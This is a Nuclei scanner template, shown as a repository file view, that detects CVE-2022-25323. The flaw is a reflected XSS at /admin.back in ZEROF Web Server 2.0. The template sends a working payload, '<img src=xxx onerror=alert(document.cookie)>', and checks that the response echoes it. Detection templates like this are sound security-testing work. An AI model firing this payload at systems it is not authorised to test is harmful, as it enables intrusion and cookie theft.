nuclei-templates/cves/2022/CVE-2022-25323.yaml

28 lines
604 B
YAML
Raw Normal View History

2022-02-19 22:32:01 +00:00
id: CVE-2022-25323
info:
name: ZEROF Web Server 2.0 XSS
author: pikpikcu
severity: medium
description: ZEROF Web Server 2.0 allows /admin.back XSS.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
tags: xss,cve,cve2022,zerof
requests:
- method: GET
path:
- "{{BaseURL}}/admin.back<img%20src=xxx%20onerror=alert(document.cookie)>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=xxx onerror=alert(document.cookie)>'
condition: and
- type: status
status:
- 200